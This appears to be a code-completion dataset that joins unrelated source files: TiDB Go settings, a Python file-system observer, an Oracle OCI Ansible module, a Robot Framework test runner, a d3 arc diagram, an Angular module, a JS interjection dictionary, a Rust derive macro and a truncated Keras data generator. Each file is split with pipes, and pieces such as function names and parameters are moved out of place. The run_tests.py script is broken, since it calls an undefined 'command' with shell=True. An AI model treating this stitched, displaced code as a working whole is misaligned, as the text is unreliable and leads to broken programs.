DefTiDBTopSQLPrecisionSeconds = 1
DefTiDBTopSQLMaxStatementCount = 200
DefTiDBTopSQLMaxCollect = 10000
DefTiDBTopSQLReportIntervalSeconds = 60
DefTiDBEnableGlobalTemporaryTable = false
DefTMPTableSize = 16777216
DefTiDBEnableLocalTxn = false
DefTiDBEnableOrderedResultMode = false
)
// Process global variables.
var (
ProcessGeneralLog = atomic.NewBool(false)
EnablePProfSQLCPU = atomic.NewBool(false)
ddlReorgWorkerCounter int32 = DefTiDBDDLReorgWorkerCount
maxDDLReorgWorkerCount int32 = 128
ddlReorgBatchSize int32 = DefTiDBDDLReorgBatchSize
ddlErrorCountlimit int64 = DefTiDBDDLErrorCountLimit
ddlReorgRowFormat int64 = DefTiDBRowFormatV2
maxDeltaSchemaCount int64 = DefTiDBMaxDeltaSchemaCount
// Export for testing.
MaxDDLReorgBatchSize int32 = 10240
MinDDLReorgBatchSize int32 = 32
// DDLSlowOprThreshold is the threshold for ddl slow operations, uint is millisecond.
DDLSlowOprThreshold uint32 = DefTiDBDDLSlowOprThreshold
ForcePriority = int32(DefTiDBForcePriority)
MaxOfMaxAllowedPacket uint64 = 1073741824
ExpensiveQueryTimeThreshold uint64 = DefTiDBExpensiveQueryTimeThreshold
MinExpensiveQueryTimeThreshold uint64 = 10 // 10s
CapturePlanBaseline = serverGlobalVariable{globalVal: Off}
DefExecutorConcurrency = 5
MemoryUsageAlarmRatio = atomic.NewFloat64(config.GetGlobalConfig().Performance.MemoryUsageAlarmRatio)
TopSQLVariable = TopSQL{
Enable: atomic.NewBool(DefTiDBTopSQLEnable),
AgentAddress: atomic.NewString(DefTiDBTopSQLAgentAddress),
PrecisionSeconds: atomic.NewInt64(DefTiDBTopSQLPrecisionSeconds),
MaxStatementCount: atomic.NewInt64(DefTiDBTopSQLMaxStatementCount),
MaxCollect: atomic.NewInt64(DefTiDBTopSQLMaxCollect),
ReportIntervalSeconds: atomic.NewInt64(DefTiDBTopSQLReportIntervalSeconds),
}
EnableLocalTxn = atomic.NewBool(DefTiDBEnableLocalTxn)
)
// TopSQL is the variable for control top sql feature.
type TopSQL struct {
// Enable top-sql or not.
Enable *atomic.Bool
// AgentAddress indicate the collect agent address.
AgentAddress *atomic.String
// The refresh interval of top-sql.
PrecisionSeconds *atomic.Int64
// The maximum number of statements kept in memory.
MaxStatementCount *atomic.Int64
// The maximum capacity of the collect map.
MaxCollect *atomic.Int64
// The report data interval of top-sql.
ReportIntervalSeconds *atomic.Int64
}
// TopSQLEnabled uses to check whether enabled the top SQL feature.
func TopSQLEnabled() bool {
| return TopSQLVariable.Enable.Load() && TopSQLVariable.AgentAddress.Load() != ""
}
|
|
FileSystemObserver.py | import logging
import time
from threading import Event
from watchdog.observers import Observer
from .OutputEventHandler import OutputEventHandler
class FileSystemObserver(object):
| def __init__(self, test_output_dir):
self.test_output_dir = test_output_dir
# Start observing output dir
self.done_event = Event()
self.event_handler = OutputEventHandler(self.done_event)
self.observer = Observer()
self.observer.schedule(self.event_handler, self.test_output_dir, recursive=True)
self.observer.start()
def get_output_dir(self):
return self.test_output_dir
def restart_observer_if_needed(self):
if self.observer.is_alive():
return
self.observer = Observer()
self.done_event.clear()
self.observer.schedule(self.event_handler, self.test_output_dir, recursive=True)
self.observer.start()
def wait_for_output(self, timeout_seconds, output_validator, max_files):
logging.info('Waiting up to %d seconds for %d test outputs...', timeout_seconds, max_files)
self.restart_observer_if_needed()
wait_start_time = time.perf_counter()
for i in range(0, max_files):
# Note: The timing on Event.wait() is inaccurate
self.done_event.wait(timeout_seconds)
self.done_event.clear()
current_time = time.perf_counter()
if timeout_seconds < (current_time - wait_start_time) or output_validator.validate():
break
self.observer.stop()
self.observer.join() |
|
oci_data_catalog_namespace_facts.py | #!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_data_catalog_namespace_facts
short_description: Fetches details about one or multiple Namespace resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple Namespace resources in Oracle Cloud Infrastructure
- Returns a list of namespaces within a data catalog.
- If I(namespace_id) is specified, the details of a single Namespace will be returned.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
catalog_id:
description:
- Unique catalog identifier.
type: str
required: true
namespace_id:
description:
- Unique namespace identifier.
- Required to get a specific namespace.
type: str
aliases: ["id"]
fields:
description:
- Specifies the fields to return in a namespace response.
type: list
elements: str
choices:
- "key"
- "displayName"
- "description"
- "lifecycleState"
- "timeCreated"
- "timeUpdated"
- "createdById"
- "updatedById"
- "properties"
display_name:
description:
- A filter to return only resources that match the entire display name given. The match is not case sensitive.
type: str
aliases: ["name"]
display_name_contains:
description:
- "A filter to return only resources that match display name pattern given. The match is not case sensitive.
For Example : /folders?displayNameContains=Cu.*
The above would match all folders with display name that starts with \\"Cu\\" or has the pattern \\"Cu\\" anywhere in between."
type: str
lifecycle_state:
description:
- A filter to return only resources that match the specified lifecycle state. The value is case insensitive.
type: str
choices:
- "CREATING"
- "ACTIVE"
- "INACTIVE"
- "UPDATING"
- "DELETING"
- "DELETED"
- "FAILED"
- "MOVING"
time_created:
description:
- Time that the resource was created. An L(RFC3339,https://tools.ietf.org/html/rfc3339) formatted datetime string.
type: str
time_updated:
description:
- Time that the resource was updated. An L(RFC3339,https://tools.ietf.org/html/rfc3339) formatted datetime string.
type: str
created_by_id:
description:
- OCID of the user who created the resource.
type: str
updated_by_id:
description:
- OCID of the user who updated the resource.
type: str
sort_by:
description:
- The field to sort by. Only one sort order may be provided. Default order for TIMECREATED is descending. Default order for DISPLAYNAME is
ascending. If no value is specified TIMECREATED is default.
type: str
choices:
- "TIMECREATED"
- "DISPLAYNAME"
sort_order:
description:
- The sort order to use, either 'asc' or 'desc'.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: Get a specific namespace
oci_data_catalog_namespace_facts:
# required
catalog_id: "ocid1.catalog.oc1..xxxxxxEXAMPLExxxxxx"
namespace_id: "ocid1.namespace.oc1..xxxxxxEXAMPLExxxxxx"
# optional
fields: [ "key" ]
- name: List namespaces
oci_data_catalog_namespace_facts:
# required
catalog_id: "ocid1.catalog.oc1..xxxxxxEXAMPLExxxxxx"
# optional
fields: [ "key" ]
display_name: display_name_example
display_name_contains: display_name_contains_example
lifecycle_state: CREATING
time_created: 2013-10-20T19:20:30+01:00
time_updated: 2013-10-20T19:20:30+01:00
created_by_id: "ocid1.createdby.oc1..xxxxxxEXAMPLExxxxxx"
updated_by_id: "ocid1.updatedby.oc1..xxxxxxEXAMPLExxxxxx"
sort_by: TIMECREATED
sort_order: ASC
"""
RETURN = """
namespaces:
description:
- List of Namespace resources
returned: on success
type: complex
contains:
key:
description:
- Unique namespace key that is immutable.
returned: on success
type: str
sample: key_example
display_name:
description:
- Name of the Namespace
returned: on success
type: str
sample: display_name_example
description:
description:
- Description for the namespace
returned: on success
type: str
sample: description_example
is_service_defined:
description:
- If this field is defined by service or by a user
returned: on success
type: bool
sample: true
lifecycle_state:
description: | type: str
sample: CREATING
time_created:
description:
- "The date and time the namespace was created, in the format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
Example: `2019-03-25T21:10:29.600Z`"
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The last time that any change was made to the namespace. An L(RFC3339,https://tools.ietf.org/html/rfc3339) formatted datetime string.
- Returned for get operation
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
created_by_id:
description:
- OCID of the user who created the namespace.
- Returned for get operation
returned: on success
type: str
sample: "ocid1.createdby.oc1..xxxxxxEXAMPLExxxxxx"
updated_by_id:
description:
- OCID of the user who last modified the namespace.
- Returned for get operation
returned: on success
type: str
sample: "ocid1.updatedby.oc1..xxxxxxEXAMPLExxxxxx"
sample: [{
"key": "key_example",
"display_name": "display_name_example",
"description": "description_example",
"is_service_defined": true,
"lifecycle_state": "CREATING",
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"created_by_id": "ocid1.createdby.oc1..xxxxxxEXAMPLExxxxxx",
"updated_by_id": "ocid1.updatedby.oc1..xxxxxxEXAMPLExxxxxx"
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.data_catalog import DataCatalogClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class DataCatalogNamespaceFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: get, list"""
def get_required_params_for_get(self):
return [
"catalog_id",
"namespace_id",
]
def get_required_params_for_list(self):
return [
"catalog_id",
]
def get_resource(self):
optional_get_method_params = [
"fields",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_get_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.call_with_backoff(
self.client.get_namespace,
catalog_id=self.module.params.get("catalog_id"),
namespace_id=self.module.params.get("namespace_id"),
**optional_kwargs
)
def list_resources(self):
optional_list_method_params = [
"display_name",
"display_name_contains",
"lifecycle_state",
"time_created",
"time_updated",
"created_by_id",
"updated_by_id",
"sort_by",
"sort_order",
"fields",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_namespaces,
catalog_id=self.module.params.get("catalog_id"),
**optional_kwargs
)
DataCatalogNamespaceFactsHelperCustom = get_custom_class(
"DataCatalogNamespaceFactsHelperCustom"
)
class ResourceFactsHelper(
DataCatalogNamespaceFactsHelperCustom, DataCatalogNamespaceFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
catalog_id=dict(type="str", required=True),
namespace_id=dict(aliases=["id"], type="str"),
fields=dict(
type="list",
elements="str",
choices=[
"key",
"displayName",
"description",
"lifecycleState",
"timeCreated",
"timeUpdated",
"createdById",
"updatedById",
"properties",
],
),
display_name=dict(aliases=["name"], type="str"),
display_name_contains=dict(type="str"),
lifecycle_state=dict(
type="str",
choices=[
"CREATING",
"ACTIVE",
"INACTIVE",
"UPDATING",
"DELETING",
"DELETED",
"FAILED",
"MOVING",
],
),
time_created=dict(type="str"),
time_updated=dict(type="str"),
created_by_id=dict(type="str"),
updated_by_id=dict(type="str"),
sort_by=dict(type="str", choices=["TIMECREATED", "DISPLAYNAME"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="namespace",
service_client_class=DataCatalogClient,
namespace="data_catalog",
)
result = []
if resource_facts_helper.is_get():
result = [resource_facts_helper.get()]
elif resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(namespaces=result)
if __name__ == "__main__":
main() | - The current state of the namespace.
returned: on success |
run_tests.py | #!/usr/bin/env python
import env
import os
import sys
from subprocess import Popen, call
from tempfile import TemporaryFile
#from run_unit_tests import run_unit_tests
ROBOT_ARGS = [
'--doc', 'YamlVariablesOutput',
'--outputdir', '%(outdir)s',
'--escape', 'space:SP',
'--report', 'none',
'--log', 'none',
'--loglevel', 'DEBUG',
'--pythonpath', '%(pythonpath)s',
]
REBOT_ARGS = [
'--outputdir', '%(outdir)s',
'--name', 'YamlVariablesOutput',
'--escape', 'space:SP',
'--critical', 'regression',
'--noncritical', 'inprogress',
]
ARG_VALUES = {'outdir': env.RESULTS_DIR, 'pythonpath': env.SRC_DIR}
def acceptance_tests(interpreter, args):
#ARG_VALUES['browser'] = browser.replace('*', '')
runner = {'python': 'pybot', 'jython': 'jybot', 'ipy': 'ipybot'}[interpreter]
if os.sep == '\\':
runner += '.bat'
execute_tests(runner, args)
return process_output(args)
def execute_tests(runner, args):
if not os.path.exists(env.RESULTS_DIR):
os.mkdir(env.RESULTS_DIR)
#command = [runner] + [arg % ARG_VALUES for arg in ROBOT_ARGS] + args + [env.ACCEPTANCE_TEST_DIR]
tmp1 = [arg % ARG_VALUES for arg in ROBOT_ARGS] + args + [env.ACCEPTANCE_TEST_DIR]
print ' '.join(tmp1)
#command = [runner]
#command.append(' '.join(tmp1))
#command = [' '.join(tmp1)]
#command.append(runner)
print ''
print 'Starting test execution with command:\n' + ' '.join(command)
syslog = os.path.join(env.RESULTS_DIR, 'syslog.txt')
print os.sep
print command
#call(command, shell=os.sep=='\\', env=dict(os.environ, ROBOT_SYSLOG_FILE=syslog))
call(command, shell=True, env=dict(os.environ, ROBOT_SYSLOG_FILE=syslog))
#call(command, env=dict(os.environ))
#print ' '.join(command)
#call('pybot', '--doc YamlVariablesOutput --outputdir /Users/julesbarnes/workspace/git/robotframework-yamlvariableslibrary/YamlVariablesLibrary/tests/results --escape space:SP --report none --log none --loglevel DEBUG --pythonpath /Users/julesbarnes/workspace/git/robotframework-yamlvariableslibrary/YamlVariablesLibrary/tests/.. --loglevel DEBUG /Users/julesbarnes/workspace/git/robotframework-yamlvariableslibrary/YamlVariablesLibrary/tests/acceptance')
def process_output(args):
print
if _has_robot_27():
call(['python', os.path.join(env.RESOURCES_DIR, 'statuschecker.py'),
os.path.join(env.RESULTS_DIR, 'output.xml')])
rebot = 'rebot' if os.sep == '/' else 'rebot.bat'
rebot_cmd = [rebot] + [ arg % ARG_VALUES for arg in REBOT_ARGS ] + args + \
[os.path.join(ARG_VALUES['outdir'], 'output.xml') ]
rc = call(rebot_cmd, env=os.environ)
if rc == 0:
print 'All critical tests passed'
else:
print '%d critical test%s failed' % (rc, 's' if rc != 1 else '')
return rc
def _has_robot_27():
try:
from robot.result import ExecutionResult
except:
return False
return True
def _exit(rc):
sys.exit(rc)
def | ():
print 'Usage: python run_tests.py python|jython browser [options]'
print
print 'See README.txt for details.'
return 255
#def _run_unit_tests():
# print 'Running unit tests'
# failures = run_unit_tests()
# if failures != 0:
# print '\n%d unit tests failed - not running acceptance tests!' % failures
# else:
# print 'All unit tests passed'
# return failures
if __name__ == '__main__':
if not len(sys.argv) > 1:
_exit(_help())
# unit_failures = _run_unit_tests()
# if unit_failures:
# _exit(unit_failures)
interpreter = sys.argv[1]
# browser = sys.argv[2].lower()
args = sys.argv[2:]
_exit(acceptance_tests(interpreter, args)) | _help |
render.js | import * as d3 from 'd3'
import * as louvain from 'louvain'
/*
Credits:
Inspired by https://observablehq.com/@d3/arc-diagram
*/
export function render(svgNode, data, visualOptions, mapping, originalData) {
const {
// artboard
width,
height,
background, | //chart
minDiameter,
maxDiameter,
nodeSize,
orderNodesBy,
linkOpacity,
sameSide,
} = visualOptions
const margin = {
top: marginTop,
right: marginRight,
bottom: marginBottom,
left: marginLeft,
}
const chartWidth = width - margin.left - margin.right
const chartHeight = height - margin.top - margin.bottom
// create a graph data file from the incoming data
let graph = graphFromEdgesTable(data)
//compute nodes modularity
if (orderNodesBy == 'Minimize overlaps') {
let community = louvain
.jLouvain()
.nodes(graph.nodes.map((d) => d.id))
.edges(
graph.links.map((d) => ({
source: d.source.id,
target: d.target.id,
weight: d.value,
}))
)
let results = community()
graph.nodes.forEach((n) => (n.community = results[n.id]))
}
// sort nodes
// 'Name', 'Links count (degree)', 'Total value'
graph.nodes.sort((a, b) => {
switch (orderNodesBy) {
case 'Total value':
return d3.descending(a.totalValue, b.totalValue)
case 'Links count (degree)':
return d3.ascending(a.degree, b.degree)
case 'Name':
return d3.ascending(a.id, b.id)
case 'Minimize overlaps':
return d3.ascending(a.community, b.community)
default:
return 0
}
})
// size scale
const sizeScale = d3
.scaleSqrt()
.domain([0, d3.max(graph.nodes, (d) => d[nodeSize])])
.range([minDiameter, maxDiameter])
// widthScale (for nodes)
const widthScale = d3
.scaleLinear()
.domain([0, d3.max(graph.links, (d) => d.value)])
.range([0, maxDiameter])
// get the total size
const totalValue = d3.sum(graph.nodes, (d) => sizeScale(d[nodeSize]) * 2)
// compute padding
const padding = (chartWidth - totalValue) / (graph.nodes.length - 1)
// compute x positions. @TODO could be improved
let xPos = 0
graph.nodes.forEach((d, i) => {
d.x = xPos + sizeScale(d[nodeSize])
d.y = sameSide ? chartHeight - maxDiameter : chartHeight / 2
xPos += padding + sizeScale(d[nodeSize]) * 2
})
// add background
d3.select(svgNode)
.append('rect')
.attr('width', width)
.attr('height', height)
.attr('x', 0)
.attr('y', 0)
.attr('fill', background)
.attr('id', 'backgorund')
const svg = d3
.select(svgNode)
.append('g')
.attr('transform', 'translate(' + margin.left + ',' + margin.top + ')')
.attr('id', 'viz')
// draw links
const arcs = svg.append('g').attr('id', 'arcs')
arcs
.selectAll('path')
.data(graph.links)
.enter()
.append('path')
.attr('d', (d) => {
const r = Math.abs(d.source.x - d.target.x) / 2
const sweep = sameSide ? (d.source.x < d.target.x ? 1 : 0) : 1
return `M${d.source.x},${d.source.y}A${r},${r} 0,0,${sweep} ${d.target.x},${d.target.y}`
})
.attr('fill', 'none')
.attr('stroke', 'gray')
.attr('stroke-width', (d) => widthScale(d.value))
.attr('opacity', linkOpacity)
// draw nodes
const nodes = svg
.append('g')
.attr('id', 'nodes')
.selectAll('g')
.data(graph.nodes)
.enter()
.append('g')
// add circles
nodes
.append('circle')
.attr('cx', (d) => d.x)
.attr('cy', (d) => d.y)
.attr('r', (d) => sizeScale(d[nodeSize]))
// add labels
nodes
.append('text')
// .attr('x', (d) => d.x)
// .attr('y', (d) => d.y + sizeScale(d[nodeSize]))
.text((d) => d.id)
.attr(
'transform',
(d) => `translate(${d.x},${d.y + sizeScale(d[nodeSize]) + 5}) rotate(-90)`
)
.attr('alignment-baseline', 'middle')
.attr('font-family', 'Helvetica, Arial, sans-serif')
.attr('font-size', 12)
.attr('text-anchor', 'end')
}
/*
helper function to create a graph js object
*/
function graphFromEdgesTable(_edgesTable) {
// links are a deep copy of the dataset, to avoid modification of origina data variable
let links = _edgesTable.map((d) => Object.assign({}, d))
const nodes = Array.from(
new Set(links.flatMap((l) => [l.source, l.target])),
(id) => ({
id,
outLinks: [],
inLinks: [],
totalValue: 0,
inValue: 0,
outValue: 0,
degree: 0,
inDegree: 0,
outDegree: 0,
default: 1,
})
)
const nodeById = new Map(nodes.map((d) => [d.id, d]))
//links are now re-populated ank linked to nodes objects
links = links.map(({ source, target, value }) => ({
source: nodeById.get(source),
target: nodeById.get(target),
value,
}))
// links added to nodes objects
for (const link of links) {
const { source, target, value } = link
//update source
source.outLinks.push(link)
source.totalValue += link.value
source.outValue += link.value
source.degree++
source.outDegree++
//update target
target.inLinks.push(link)
target.degree++
target.inDegree++
target.totalValue += link.value
target.inValue += link.value
}
return { nodes, links }
} | marginTop,
marginRight,
marginBottom,
marginLeft, |
fw.module.ts | import { NgModule } from '@angular/core';
import { CommonModule } from '@angular/common';
import { RouterModule } from '@angular/router';
import { FormsModule } from '@angular/forms';
import { FrameworkBodyComponent } from './framework-body/framework-body.component';
import { ContentComponent } from './content/content.component';
import { TitleBarComponent } from './title-bar/title-bar.component';
import { FrameworkConfigService } from './services/framework-config.service';
import { TopBarComponent } from './top-bar/top-bar.component';
import { StatusBarComponent } from './status-bar/status-bar.component';
import { ScreenService } from './services/screen.service';
import { ScreenLarge } from './directives/screen-large.directive';
import { ScreenBelowLarge } from './directives/screen-below-large.directive';
import { MenuService } from './services/menu.service';
import { MenuComponent } from './menus/menu/menu.component';
import { MenuItemComponent } from './menus/menu-item/menu-item.component';
import { PopupMenuComponent } from './menus/popup-menu/popup-menu.component';
import { SignInComponent } from './users/sign-in/sign-in.component';
import { RegisterUserComponent } from './users/register-user/register-user.component';
@NgModule({
imports: [
CommonModule,
RouterModule,
FormsModule
],
declarations: [
FrameworkBodyComponent,
ContentComponent,
TitleBarComponent,
TopBarComponent,
StatusBarComponent,
ScreenLarge,
ScreenBelowLarge,
MenuComponent,
MenuItemComponent,
PopupMenuComponent,
SignInComponent,
RegisterUserComponent
],
providers: [
FrameworkConfigService,
ScreenService,
MenuService
],
exports: [
FrameworkBodyComponent
]
})
export class | { }
| FwModule |
interjection.dictionary.js | import Dictionary from '../dictionary';
import Interjection from '../partsOfSpeech/interjection';
import Word from '../word';
/**
* @param {String} word word to search for
* @returns {Object} Interjection if successful, Word if unsuccessful
*/
function findInterjection(word) {
const list = this.list.filter(obj => word.indexOf(obj.interjection.toLowerCase()) !== -1);
const typedList = list.map(intObj => new Interjection(
intObj.interjection,
intObj.type,
// eslint-disable-next-line function-paren-newline | /** Interjection Dictionary
* @param {Array} list Interjections with types and wordCategories
* @param {String} language two-letter abbreviation of language
* @member {list} Array of typed Interjections
* @member {language} String language for the dictionary
* @method {findWord} searches for a word in the dictionary and returns an Interjection or a Word
*/
function InterjectionDictionary(list, language) {
const sortedList = list.sort((a, b) => {
if (a.interjection < b.interjection) return -1;
if (a.interjection > b.interjection) return 1;
return 0;
});
this.GrammarModel = Interjection;
this.partOfSpeech = 'interjection';
this.list = sortedList;
this.language = language;
}
InterjectionDictionary.prototype = Object.create(Dictionary.prototype);
InterjectionDictionary.prototype.findWord = findInterjection;
export default InterjectionDictionary; | intObj.wordCategory));
return typedList.length === 0 ? new Word(word) : typedList[0];
} |
queriable.rs | // Copyright (c) Facebook, Inc. and its affiliates.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use crate::helper::{get_metadata, occurrence_error, parse_option, to_camelcase};
use proc_macro2::{Span, TokenStream};
use quote::quote;
use syn::{
parse::{Parse, ParseStream},
spanned::Spanned,
DeriveInput, Field, Ident, Token,
};
mod kw {
use syn::custom_keyword;
// struct metadata
custom_keyword!(field_id_name);
// field metadata
custom_keyword!(ignore);
custom_keyword!(subquery);
custom_keyword!(preferred_name);
}
pub enum StructMeta {
FieldIdName { kw: kw::field_id_name, value: Ident },
}
impl Parse for StructMeta {
fn parse(input: ParseStream) -> syn::Result<Self> {
let lookahead = input.lookahead1();
if lookahead.peek(kw::field_id_name) {
let kw = input.parse()?;
let _: Token![=] = input.parse()?;
let value = input.parse()?;
Ok(StructMeta::FieldIdName { kw, value })
} else {
Err(lookahead.error())
}
}
}
impl Spanned for StructMeta {
fn span(&self) -> Span {
match self {
StructMeta::FieldIdName { kw, .. } => kw.span,
}
}
}
pub enum FieldMeta {
Ignore(kw::ignore),
Subquery {
kw: kw::subquery,
value: Option<syn::Type>,
},
PreferredName {
kw: kw::preferred_name,
value: Ident,
},
}
impl Parse for FieldMeta {
fn parse(input: ParseStream) -> syn::Result<Self> {
let lookahead = input.lookahead1();
if lookahead.peek(kw::ignore) {
Ok(FieldMeta::Ignore(input.parse()?))
} else if lookahead.peek(kw::subquery) {
let kw = input.parse()?;
// Optionally accept an Ident for subquery FieldId type.
if input.peek(Token![=]) {
let _: Token![=] = input.parse()?;
let value = Some(input.parse()?);
Ok(FieldMeta::Subquery { kw, value })
} else {
Ok(FieldMeta::Subquery { kw, value: None })
}
} else if lookahead.peek(kw::preferred_name) {
let kw = input.parse()?;
let _: Token![=] = input.parse()?;
let value = input.parse()?;
Ok(FieldMeta::PreferredName { kw, value })
} else {
Err(lookahead.error())
}
}
}
impl Spanned for FieldMeta {
fn span(&self) -> Span {
match self {
FieldMeta::Ignore(kw) => kw.span,
FieldMeta::Subquery { kw, .. } => kw.span,
FieldMeta::PreferredName { kw, .. } => kw.span,
}
}
}
#[derive(Clone, Debug)]
struct QueriableStructProps {
pub field_id_name: Ident,
pub ident: Ident,
}
fn | (ast: &DeriveInput) -> syn::Result<QueriableStructProps> {
let mut field_id_name = None;
let mut field_id_name_kw = None;
for meta in get_metadata("queriable", &ast.attrs)? {
match meta {
StructMeta::FieldIdName { value, kw } => {
if let Some(fst_kw) = field_id_name_kw {
return Err(occurrence_error(fst_kw, kw, "field_id_name"));
}
field_id_name_kw = Some(kw);
field_id_name = Some(value);
}
}
}
Ok(QueriableStructProps {
field_id_name: field_id_name
// Add `FieldId` suffix for default FieldId enum name.
.unwrap_or_else(|| Ident::new(&format!("{}FieldId", ast.ident), ast.ident.span())),
ident: ast.ident.clone(),
})
}
#[derive(Clone, Debug)]
struct QueriableFieldProps {
pub ignore: bool,
pub subquery: Option<syn::Type>,
pub preferred_name: Ident,
pub ident: Ident,
pub variant_name: Ident,
pub option_type: Option<syn::Type>,
}
fn get_queriable_field_props(field: &Field) -> syn::Result<QueriableFieldProps> {
let mut ignore = false;
let mut subquery = None;
let mut preferred_name = None;
let mut ignore_kw = None;
let mut subquery_kw = None;
let mut preferred_name_kw = None;
let option_type = parse_option(&field.ty);
for meta in get_metadata("queriable", &field.attrs)? {
match meta {
FieldMeta::Ignore(kw) => {
if let Some(fst_kw) = ignore_kw {
return Err(occurrence_error(fst_kw, kw, "ignore"));
}
ignore_kw = Some(kw);
ignore = true;
}
FieldMeta::Subquery { value, kw } => {
if let Some(fst_kw) = subquery_kw {
return Err(occurrence_error(fst_kw, kw, "subquery"));
}
subquery_kw = Some(kw);
// If no type provided, infer from field type by adding `FieldId`
// suffix, which may be wrapped by Option.
subquery = value.or_else(|| {
let base_type = option_type.as_ref().unwrap_or(&field.ty);
match base_type {
syn::Type::Path(ty_path) => {
let mut ty_path = ty_path.clone();
let last_ident = &ty_path.path.segments.last()?.ident;
ty_path.path.segments.last_mut()?.ident =
Ident::new(&format!("{}FieldId", last_ident), last_ident.span());
Some(syn::Type::Path(ty_path))
}
_ => None,
}
});
if subquery.is_none() {
return Err(syn::Error::new(
field.ty.span(),
"Failed to infer subquery FieldId type",
));
}
}
FieldMeta::PreferredName { value, kw } => {
if let Some(fst_kw) = preferred_name_kw {
return Err(occurrence_error(fst_kw, kw, "preferred_name"));
}
preferred_name_kw = Some(kw);
preferred_name = Some(value.clone());
}
}
}
let ident = field
.ident
.clone()
.ok_or_else(|| syn::Error::new(field.span(), "This macro only support named fields"))?;
let preferred_name = preferred_name.unwrap_or_else(|| ident.clone());
let variant_name = to_camelcase(&preferred_name);
Ok(QueriableFieldProps {
ignore,
subquery,
preferred_name,
ident,
variant_name,
option_type,
})
}
pub fn queriable_derive_impl(ast: &DeriveInput) -> syn::Result<TokenStream> {
let struct_props = get_queriable_struct_props(ast)?;
let input_ident = struct_props.ident;
let field_id_ident = struct_props.field_id_name;
let fields = match &ast.data {
syn::Data::Struct(syn::DataStruct {
fields: syn::Fields::Named(fields),
..
}) => &fields.named,
_ => {
return Err(syn::Error::new(
Span::call_site(),
"This macro only supports struct with named fields.",
));
}
};
let mut all_field_props = Vec::new();
for field in fields {
let field_props = get_queriable_field_props(&field)?;
if !field_props.ignore {
all_field_props.push(field_props);
}
}
let field_id_variants = all_field_props.iter().map(|field_props| {
let variant_name = &field_props.variant_name;
match &field_props.subquery {
Some(subquery_field_id_type) => quote! {
#variant_name(#subquery_field_id_type),
},
None => quote! {
#variant_name,
},
}
});
let queriable_match_arms = all_field_props.iter().map(|field_props| {
let variant_name = &field_props.variant_name;
let field_ident = &field_props.ident;
if field_props.subquery.is_some() {
let query = if field_props.option_type.is_some() {
quote! { self.#field_ident.as_ref().and_then(|q| q.query(field_id)) }
} else {
quote! { self.#field_ident.query(field_id) }
};
quote! { Self::FieldId::#variant_name(field_id) => #query, }
} else {
let query = if field_props.option_type.is_some() {
quote! { self.#field_ident.as_ref().map(Field::from) }
} else {
quote! { std::option::Option::Some(Field::from(&self.#field_ident)) }
};
quote! { Self::FieldId::#variant_name => #query, }
}
});
Ok(quote! {
#[derive(
Clone,
Debug,
PartialEq,
::below_derive::EnumIter,
::below_derive::EnumFromStr,
::below_derive::EnumToString
)]
pub enum #field_id_ident {
#(#field_id_variants)*
}
impl FieldId for #field_id_ident {
type Queriable = #input_ident;
}
impl Queriable for #input_ident {
type FieldId = #field_id_ident;
fn query(&self, field_id: &Self::FieldId) -> ::std::option::Option<Field> {
match field_id {
#(#queriable_match_arms)*
}
}
}
})
}
| get_queriable_struct_props |
data_generator.py | from pathlib import PurePath
from typing import Tuple, List, Callable
import numpy as np
from tensorflow.keras.utils import Sequence
from imagededup.utils.image_utils import load_image
class DataGenerator(Sequence):
"""Class inherits from Keras Sequence base object, allows to use multiprocessing in .fit_generator.
Attributes:
image_dir: Path of image directory.
batch_size: Number of images per batch.
basenet_preprocess: Basenet specific preprocessing function.
target_size: Dimensions that images get resized into when loaded.
"""
def __init__(
self,
image_dir: PurePath,
batch_size: int,
basenet_preprocess: Callable,
target_size: Tuple[int, int],
) -> None:
"""Init DataGenerator object.
"""
self.image_dir = image_dir
self.batch_size = batch_size
self.basenet_preprocess = basenet_preprocess
self.target_size = target_size
self.counter = 0
self._get_image_files()
self.on_epoch_end()
def _get_image_files(self) -> None:
self.invalid_image_idx = []
self.image_files = sorted(
[
i.absolute()
for i in self.image_dir.glob('*')
if not i.name.startswith('.')]
) # ignore hidden files
def on_epoch_end(self) -> None:
